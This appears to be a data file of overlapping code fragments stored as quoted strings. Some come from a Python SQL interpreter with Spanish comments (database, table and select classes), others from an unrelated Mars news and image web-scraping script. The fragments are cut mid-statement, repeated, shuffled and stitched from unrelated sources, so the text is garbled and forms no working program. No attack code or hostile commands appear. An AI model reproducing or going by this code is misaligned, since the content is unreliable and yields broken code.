creadas.\\n' # se retorna un mensaje respuesta = '\\n' #", "= ifnot # si existe, no la crea self.id = id # nombre", "no viene \"OR REPLACE\" if existe: # si existe, es un error nuevo_error", "nuevo símbolo, de lo contrario no se hace nada class UseDB(): def __init__(self,", "self.replace: # si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden", "return respuesta + '\\n' # y los retorna class Drop(): def __init__(self, id):", "si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo", "import Errores as E #Creación de la tabla de simbolos ts_global = TS.tabla_simbolos()", "id def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def", "create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar = ts.agregar_columna(tabla, db, nueva_columna)", "execute(): #Llamar metodo que realizara el select print('ejecutando select') class AlterTable(): def __init__(self,", "= E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\' no existe.')", "pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se", "recorre la lista, respuesta = respuesta + '\\t' + base.id + '\\n' #", "datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de", "Select(): def __init__(self, 
dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol", "self.id = id # nombre de la base de datos self.owner = owner", "= '\\n' # de lo contrario, for base in bases: # recorre la", "sí viene \"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es", "base in bases: # recorre la lista, respuesta = respuesta + '\\t' +", "execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe", "# si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el", "self.id = id # nombre de la base de datos def execute(self, ts_global):", "creador self.mode = mode # modo de almacenamiento def execute(self, ts_global): nueva_base =", "id self.vals = vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id))", "el id return self.id # si no, es error new_error = E.Errores('Semántico.', 'La", "bases de datos if base.id == self.id: # y verifico si existe existe", "tipo self.instruccion = instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins, order,", "contrario, for base in bases: # recorre la lista, respuesta = respuesta +", "datos if len(bases) == 0: # si no hay bases de datos return", "la base de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas", "self.owner = owner # nombre/id del creador self.mode = mode # modo de", "respuesta + '\\n' # y los retorna class Drop(): def __init__(self, id): self.id", "def __init__(self, id): # string self.id = id # nombre de la base", "el valor de la bandera break # y salgo de la comprobación if", "print('ejecutando alter table') print('id : ' + str(self.id)) print('cols : ' + str(self.cols))", "ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas", "todas las bases de datos for base in bases: # verifico si existe:", "= ts_global.get_databases() # obtiene todas las bases de datos for base in bases:", "inh): self.id = id, self.base = base self.cols = cols self.inh = inh", "CreateTable(): def __init__(self, id, base, cols, inh): self.id = id, self.base = base", "ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si no viene \"OR", "' + str(col.id)) print('col type : ' + str(col.tipo)) if self.inh != None", "cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a", "mensaje respuesta = '\\n' # de lo contrario, for base in bases: #", "cond): self.id = id self.cond = cond def execute(self): print('Ejecutando Delete') print('id :", "self.replace = replace # si existe, la reemplaza/modifica self.ifnot = ifnot # si", "'\\n' # y los retorna class Drop(): def __init__(self, id): self.id = id", "str(self.id)) for col in self.cols : print('col id : ' + str(col.id)) print('col", "si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de", "col in self.cols : print('col id : ' + str(col.id)) print('col type :", "def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for val in self.vals:", "print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def __init__(self, id, vals):", "self.vals = vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for", "y salgo de la comprobación if not self.ifnot: # si no viene \"IF", "else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else:", "id, self.base = base self.cols = cols self.inh = inh 
def execute(self,ts): print('Ejecutando", "id # nombre de la base de datos self.owner = owner # nombre/id", "bases = ts_global.get_databases() # obtiene todas las bases de datos if len(bases) ==", "print('id : ' + str(self.id)) for val in self.vals: print('value : ' +", "str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB():", "print('col type : ' + str(col.tipo)) if self.inh != None : print('Inherit :", "selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol =", "nombre de la base de datos def execute(self, ts_global): bases = ts_global.get_databases() #", "existe una base de datos con el nombre \\'' + self.id + '\\'.')", "= id # nombre de la base de datos self.owner = owner #", "class UseDB(): def __init__(self, id): # string self.id = id # nombre de", "E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error)", "str(col.tipo)) if self.inh != None : print('Inherit : ' + self.inh) class Insert():", "c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna", "= columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre es ->", "' + str(self.id)) for val in self.vals: print('value : ' + str(val)) class", "self.cols = cols self.constrain = constrain self.fkey = fkey self.ref = ref def", "else: # si no viene \"OR REPLACE\" if not existe: # si no", "base in bases: # verifico si existe: if base.id == self.id: # si", "print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def __init__(self, id, base,", "todas las bases de datos if len(bases) == 0: # si no hay", "not existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se", "'\\n\\tNo hay bases de datos creadas.\\n' # se retorna un mensaje respuesta =", "= cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id : '", "si no, es error new_error = E.Errores('Semántico.', 'La base de datos \\'' +", "self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error a la lista", "replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer self.replace =", "= owner # nombre/id del creador self.mode = mode # modo de almacenamiento", "= constrain self.fkey = fkey self.ref = ref def execute(self): print('ejecutando alter table')", "#se agrega el error a la lista return None # y retorno None", "si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente", "nuevo símbolo else: # si no viene \"OR REPLACE\" if existe: # si", "id, vals): print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando Insert')", ":' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace,", "de datos return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna un", "lista else: # si no viene \"OR REPLACE\" if not existe: # si", "+ '\\n' # se concatenan los nombres return respuesta + '\\n' # y", "else: # si sí viene \"IF NOT EXISTS\" if self.replace: # si viene", "UseDB(): def __init__(self, id): # string self.id = id # nombre de la", "si existe existe = True # si existe, cambio el valor de la", "REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista", "retorna un mensaje respuesta = '\\n' # de lo contrario, for base in", "print('Ejecutando Creare Table') print('id : ' + str(self.id)) for col in self.cols :", 
"agrega el nuevo símbolo else: # si sí viene \"IF NOT EXISTS\" if", "def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer", "ts def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar = ts.agregar_columna(tabla,", "contrario no se hace nada class UseDB(): def __init__(self, id): # string self.id", "if existe: # si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe", "+ '\\n' # y los retorna class Drop(): def __init__(self, id): self.id =", "self.id) class CreateTable(): def __init__(self, id, base, cols, inh): self.id = id, self.base", "si existe: if base.id == self.id: # si sí existe, retorno el id", "str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id,", "la reemplaza/modifica self.ifnot = ifnot # si existe, no la crea self.id =", "mode # modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None,", "respuesta + '\\t' + base.id + '\\n' # se concatenan los nombres return", "no viene \"OR REPLACE\" if not existe: # si no existe la base", "execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def __init__(self, id,", "c[0] + ' y el tipo es -> ' + c[1]) #create_column(db, nombre,", "de datos if base.id == self.id: # y verifico si existe existe =", "de datos for base in bases: # verifico si existe: if base.id ==", "el error a la lista return None # y retorno None class ShowDB():", "self.id = id self.vals = vals def execute(self): print('Ejecutando Update') print('id : '", ": ' + str(col.tipo)) if self.inh != None : print('Inherit : ' +", "almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None,", "= id self.cols = cols self.constrain = constrain self.fkey = fkey self.ref =", "i.split(\":\") print('El nombre es -> ' + c[0] + ' y el tipo", "self.base = base self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando Creare", "= TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def create_table(db, nombre,", "lo contrario, for base in bases: # recorre la lista, respuesta = respuesta", "conditions def execute(): #Llamar metodo que realizara el select print('ejecutando select') class AlterTable():", "integer self.replace = replace # si existe, la reemplaza/modifica self.ifnot = ifnot #", "if self.replace: # si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No", "lista de bases de datos if base.id == self.id: # y verifico si", "def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def __init__(self,", "+ str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean,", "\"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error nuevo_error", "# se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: #", "datos for base in bases: # verifico si existe: if base.id == self.id:", "si no viene \"OR REPLACE\" if existe: # si existe, es un error", "existe, la reemplaza/modifica self.ifnot = ifnot # si existe, no la crea self.id", "if existe: # si existe la base de datos ts_global.drop_db(self.id) # se elimina,", "tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return", "# si no viene \"OR REPLACE\" if existe: # si existe, es un", 
"= id self.vals = vals def execute(self): print('Ejecutando Insert') print('id : ' +", "se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe: # si", "+ str(col.id)) print('col type : ' + str(col.tipo)) if self.inh != None :", "TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe = False # bandera", "in x: c = i.split(\":\") print('El nombre es -> ' + c[0] +", "base de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las", "#Creación de la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de lista de", "base in bases: # recorro la lista de bases de datos if base.id", "de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo", "= fromcol self.joins = joins self.order = order self.conditions = conditions def execute():", "string, integer self.replace = replace # si existe, la reemplaza/modifica self.ifnot = ifnot", "# si no viene \"OR REPLACE\" if not existe: # si no existe", "\\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error a", ": ' + self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id =", "Update(): def __init__(self, id, vals): self.id = id self.vals = vals def execute(self):", "#create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo,", "class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string,", "se agrega el nuevo símbolo, de lo contrario no se hace nada class", "la base de datos self.owner = owner # nombre/id del creador self.mode =", "si viene \"OR REPLACE\" if existe: # si existe la base de datos", "# obtiene todas las bases de datos if len(bases) == 0: # si", "bases de datos for base in bases: # recorro la lista de bases", "se agrega el nuevo símbolo else: # si sí viene \"IF NOT EXISTS\"", "constrain, fkey, ref): self.id = id self.cols = cols self.constrain = constrain self.fkey", "None, None) existe = False # bandera para comprobar si existe bases =", "id): self.id = id def execute(self): print('Ejecutando Drop') print('id : ' + self.id)", "self.id = id self.vals = vals def execute(self): print('Ejecutando Insert') print('id : '", "y el tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts)", "fkey self.ref = ref def execute(self): print('ejecutando alter table') print('id : ' +", "no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si sí", "la lista else: # si no viene \"OR REPLACE\" if not existe: #", "# recorre la lista, respuesta = respuesta + '\\t' + base.id + '\\n'", "= cols self.constrain = constrain self.fkey = fkey self.ref = ref def execute(self):", "in bases: # recorre la lista, respuesta = respuesta + '\\t' + base.id", "la lista, respuesta = respuesta + '\\t' + base.id + '\\n' # se", "NOT EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe:", "def __init__(self, id, vals): self.id = id self.vals = vals def execute(self): print('Ejecutando", "Delete(): def __init__(self, id, cond): self.id = id self.cond = cond def execute(self):", "' + str(self.id)) for col in self.cols : print('col id : ' +", "= replace # si existe, la reemplaza/modifica self.ifnot = ifnot # si existe,", "self.conditions = conditions def execute(): #Llamar metodo que realizara el select print('ejecutando select')", "# si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir", 
"dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol", "viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las", "# bandera para comprobar si existe bases = ts_global.get_databases() # obtiene todas las", "vals): self.id = id self.vals = vals def execute(self): print('Ejecutando Update') print('id :", "self.ifnot = ifnot # si existe, no la crea self.id = id #", "__init__(self, id, cond): self.id = id self.cond = cond def execute(self): print('Ejecutando Delete')", "owner # nombre/id del creador self.mode = mode # modo de almacenamiento def", "existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega", "id): # string self.id = id # nombre de la base de datos", "= id def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable():", "for col in self.cols : print('col id : ' + str(col.id)) print('col type", "' + self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id = id", "def __init__(self, id, vals): print('init') self.id = id self.vals = vals def execute(self):", "# si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base", "si existe, no la crea self.id = id # nombre de la base", "self.id # si no, es error new_error = E.Errores('Semántico.', 'La base de datos", "keys :' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self,", "datos return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna un mensaje", "= [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db,", "bandera break # y salgo de la comprobación if not self.ifnot: # si", "ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None)", "self.selcol = selcol self.fromcol = fromcol self.joins = joins self.order = order self.conditions", "val in self.vals: print('value : ' + str(val)) class Delete(): def __init__(self, id,", "= tipo self.instruccion = instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins,", "def __init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols = cols", "errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE,", "# y los retorna class Drop(): def __init__(self, id): self.id = id def" ]
[ "{'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0;", "'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title')", "as pd from splinter import Browser from bs4 import BeautifulSoup import time #dictionary", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button", "browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button", "#do all of the step above for each hemisphere img_urls =[] titles=[] for", "' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of the", "= 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search =", "page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page", "soup = BeautifulSoup(html, 'html.parser') #find the link to the full size image img_partial", "facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile',", "drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html =", "the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup", "img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html =", "soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search =", "python # coding: utf-8 def scrape(): import pandas as pd from splinter import", "'enhanced' at the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link", "i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html,", "fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page", "BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search =", "time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather", "mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html')", "url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image", "= 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url)", "full res image 
browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html", "info').click() #parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the", "soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup =", "the word 'enhanced' at the end, just getting rid of that ' '.join(title_search[0].text.split('", "all of the step above for each hemisphere img_urls =[] titles=[] for i", "title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced'", "browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery", "the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url", "= browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title')", "'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet", "mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table", "base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the", "size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en'", "soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click()", "f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup =", "the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html =", "#add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup =", "soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just getting rid of", "title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just getting", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search", "to get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html", "img_urls titles hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i]", "the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}'", "title_search = soup.find_all('h2',class_='title') titles.append(' 
'.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls =", "titles hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls)", "import pandas as pd from splinter import Browser from bs4 import BeautifulSoup import", "after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link", "p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup", "#find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles", "mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup", "mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html,", "the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking", "list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text", "soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end,", "html again after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find", "= browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to get to", "mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html,", "the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url", "'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1)", "of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all", "= BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click", "'html.parser') #find the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url", "end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url +", "= soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls", "mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0", "browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the full size image", "= BeautifulSoup(html, 
'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns =", "= mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url =", "news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html =", ") title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls", "img_search[0]['src'] img_link #do all of the step above for each hemisphere img_urls =[]", "soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns", "Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url)", "data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html,", "= BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div',", "= base_url + img_search[0]['src'] img_link #do all of the step above for each", "= browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url", "soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html =", "'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link", "soup = BeautifulSoup(html, 'html.parser') #click the image link to get to the page", "'.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of the step", "IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html =", "info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup = BeautifulSoup(html,", "soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls", "title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p", "= BeautifulSoup(html, 'html.parser') #click the image link to get to the page with", "#dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', 
**executable_path,", "more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup =", "'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table", "'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html =", "browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append('", "**executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/'", "html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0]", "browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url =", "executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows", "Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url =", "to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "= BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url)", "that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of", "soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles", 